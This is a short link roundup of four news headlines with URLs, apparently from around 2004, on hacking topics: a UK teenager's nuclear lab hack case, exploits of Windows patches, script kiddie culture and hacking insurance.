UK teen escapes jail in nuclear lab hack case
http://www.theregister.co.uk/content/55/35280.html
Hackers exploit Windows patches
http://news.bbc.co.uk/1/hi/technology/3485972.stm
A peek at script kiddie culture
http://software.newsforge.com/software/04/02/28/0130209.shtml
Hacking insurance is a must
http://www.vnunet.com/News/1153579
